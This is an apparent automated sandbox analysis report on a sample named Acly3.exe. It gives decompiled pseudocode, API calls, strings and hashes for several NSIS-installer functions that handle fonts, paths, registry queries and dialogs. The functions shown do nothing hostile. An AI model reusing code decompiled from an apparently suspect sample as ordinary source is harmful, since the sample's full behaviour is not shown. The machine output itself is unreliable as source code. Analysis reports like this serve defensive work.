                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                            • String ID:
                                                                            • API String ID: 1849352358-0
                                                                            • Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                            • Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
                                                                            • Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                            • Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401E4E, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 73%
                                                                            			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce00 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce07 = 1;
				 *0x40ce04 = _t15 & 0x00000001;
				 *0x40ce05 = _t15 & 0x00000002;
				 *0x40ce06 = _t15 & 0x00000004;
				E0040657A(_t9, _t31, _t33, 0x40ce0c,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf0);
				_push(_t18);
				_push(_t31);
				E00406484();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                                            0x00401e4e
                                                                            0x00401e59
                                                                            0x00401e5b
                                                                            0x00401e68
                                                                            0x00401e7f
                                                                            0x00401e84
                                                                            0x00401e91
                                                                            0x00401e96
                                                                            0x00401e9a
                                                                            0x00401ea5
                                                                            0x00401eac
                                                                            0x00401ebe
                                                                            0x00401ec4
                                                                            0x00401ec9
                                                                            0x00401ed3
                                                                            0x00402638
                                                                            0x0040156d
                                                                            0x00402ba4
                                                                            0x00402c2d
                                                                            0x00402c39

                                                                            APIs
                                                                            • GetDC.USER32(?), ref: 00401E51
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                            • MulDiv.KERNEL32 ref: 00401E73
                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                              • Part of subcall function 0040657A: lstrcatW.KERNEL32 ref: 0040671F
                                                                              • Part of subcall function 0040657A: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\Acly3.exe,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                                                                            • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                            • String ID:
                                                                            • API String ID: 2584051700-0
                                                                            • Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                                            • Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
                                                                            • Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                                            • Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00404D46, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 77%
                                                                            			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E0040657A(_t44, _t50, 0x42d268, 0x42d268, _a8);
				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
			}



















                                                                            0x00404d4f
                                                                            0x00404d54
                                                                            0x00404d5c
                                                                            0x00404d5d
                                                                            0x00404d6a
                                                                            0x00404d72
                                                                            0x00404d73
                                                                            0x00404d75
                                                                            0x00404d77
                                                                            0x00404d79
                                                                            0x00404d7c
                                                                            0x00404d7c
                                                                            0x00404d83
                                                                            0x00404d89
                                                                            0x00404d89
                                                                            0x00404d90
                                                                            0x00404d97
                                                                            0x00404d9a
                                                                            0x00404d9d
                                                                            0x00404d9d
                                                                            0x00404da1
                                                                            0x00404db1
                                                                            0x00404db3
                                                                            0x00404db6
                                                                            0x00404d5f
                                                                            0x00404d5f
                                                                            0x00404d66
                                                                            0x00404d66
                                                                            0x00404dbe
                                                                            0x00404dc9
                                                                            0x00404ddf
                                                                            0x00404df0
                                                                            0x00404e0c

                                                                            APIs
                                                                            • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                            • wsprintfW.USER32 ref: 00404DF0
                                                                            • SetDlgItemTextW.USER32 ref: 00404E03
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                            • String ID: %u.%u%s%s
                                                                            • API String ID: 3540041739-3551169577
                                                                            • Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                                            • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                                                                            • Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                                            • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405E0C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 58%
                                                                            			E00405E0C(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                                                                            0x00405e0d
                                                                            0x00405e1a
                                                                            0x00405e1b
                                                                            0x00405e26
                                                                            0x00405e2e
                                                                            0x00405e2e
                                                                            0x00405e36

                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                                                                            • CharPrevW.USER32(?,00000000), ref: 00405E1C
                                                                            • lstrcatW.KERNEL32 ref: 00405E2E
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 2659869361-4017390910
                                                                            • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                            • Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
                                                                            • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                            • Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00403019, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00403019(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x42aa20; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x434f0c;
						if(_t2 >  *0x434f0c) {
							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F93, 0);
							 *0x42aa20 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406946(0);
					}
				} else {
					_t6 =  *0x42aa20; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x42aa20 = 0;
					return _t6;
				}
			}






                                                                            0x00403020
                                                                            0x0040303a
                                                                            0x00403040
                                                                            0x0040304a
                                                                            0x00403050
                                                                            0x00403056
                                                                            0x00403067
                                                                            0x00403070
                                                                            0x00000000
                                                                            0x00403075
                                                                            0x0040307c
                                                                            0x00403042
                                                                            0x00403049
                                                                            0x00403049
                                                                            0x00403022
                                                                            0x00403022
                                                                            0x00403029
                                                                            0x0040302c
                                                                            0x0040302c
                                                                            0x00403032
                                                                            0x00403039
                                                                            0x00403039

                                                                            APIs
                                                                            • DestroyWindow.USER32 ref: 0040302C
                                                                            • GetTickCount.KERNEL32(00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040304A
                                                                            • CreateDialogParamW.USER32 ref: 00403067
                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00403075
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                            • String ID:
                                                                            • API String ID: 2102729457-0
                                                                            • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                            • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
                                                                            • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                            • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405F14, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 53%
                                                                            			E00405F14(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040653D(0x42fa70, _a4);
				_t21 = E00405EB7(0x42fa70);
				if(_t21 != 0) {
					E004067C4(_t21);
					if(( *0x434f18 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x42fa70 >> 1;
						while(1) {
							_t11 = lstrlenW(0x42fa70);
							_push(0x42fa70);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E00406873();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405E58(0x42fa70);
								continue;
							} else {
								goto L1;
							}
						}
						E00405E0C();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                                                            0x00405f20
                                                                            0x00405f2b
                                                                            0x00405f2f
                                                                            0x00405f36
                                                                            0x00405f42
                                                                            0x00405f52
                                                                            0x00405f54
                                                                            0x00405f6c
                                                                            0x00405f6d
                                                                            0x00405f74
                                                                            0x00405f75
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405f58
                                                                            0x00405f5f
                                                                            0x00405f67
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405f5f
                                                                            0x00405f77
                                                                            0x00000000
                                                                            0x00405f8b
                                                                            0x00405f44
                                                                            0x00405f4a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405f4a
                                                                            0x00405f31
                                                                            0x00000000

                                                                            APIs
                                                                              • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                              • Part of subcall function 00405EB7: CharNextW.USER32(?), ref: 00405EC5
                                                                              • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                              • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                            • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,74EDD4C4,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                                                                            • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74EDD4C4,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F14
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 3248276644-4017390910
                                                                            • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                            • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                                                                            • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                            • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405513, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 89%
                                                                            			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
							_push(_t16);
							_push(6);
							 *0x42d254 = _t16;
							E00404ED4();
						}
						L11:
						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404E54(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004044E5(0x413);
				return 0;
			}





                                                                            0x00405517
                                                                            0x00405521
                                                                            0x0040553d
                                                                            0x0040555f
                                                                            0x00405562
                                                                            0x00405568
                                                                            0x00405572
                                                                            0x00405573
                                                                            0x00405575
                                                                            0x0040557b
                                                                            0x0040557b
                                                                            0x00405585
                                                                            0x00000000
                                                                            0x00405593
                                                                            0x0040554a
                                                                            0x00405582
                                                                            0x00405582
                                                                            0x00000000
                                                                            0x00405582
                                                                            0x00405556
                                                                            0x00405558
                                                                            0x00000000
                                                                            0x00405558
                                                                            0x00405527
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040552e
                                                                            0x00000000

                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 00405542
                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
                                                                              • Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                            • String ID:
                                                                            • API String ID: 3748168415-3916222277
                                                                            • Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                            • Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
                                                                            • Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                            • Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040640B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 90%
                                                                            			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                                            0x00406419
                                                                            0x0040641b
                                                                            0x00406433
                                                                            0x00406438
                                                                            0x0040643d
                                                                            0x0040647b
                                                                            0x0040647b
                                                                            0x0040643f
                                                                            0x00406451
                                                                            0x0040645c
                                                                            0x00406462
                                                                            0x0040646d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040646d
                                                                            0x00406481

                                                                            APIs
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800), ref: 00406451
                                                                            • RegCloseKey.ADVAPI32(?), ref: 0040645C
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\Acly3.exe, xrefs: 00406412
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: CloseQueryValue
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\Acly3.exe
                                                                            • API String ID: 3356406503-569140738
                                                                            • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                            • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                                                                            • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                            • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00403B57, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00403B57() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x42b22c;
				_t3 = E00403B3C(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x42b22c =  *0x42b22c & 0x00000000;
				return _t3;
			}







                                                                            0x00403b58
                                                                            0x00403b60
                                                                            0x00403b67
                                                                            0x00403b6a
                                                                            0x00403b6a
                                                                            0x00403b6c
                                                                            0x00403b71
                                                                            0x00403b78
                                                                            0x00403b7e
                                                                            0x00403b82
                                                                            0x00403b83
                                                                            0x00403b8b

                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?,74EDD4C4,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                                                                            • GlobalFree.KERNEL32(?), ref: 00403B78
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: Free$GlobalLibrary
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
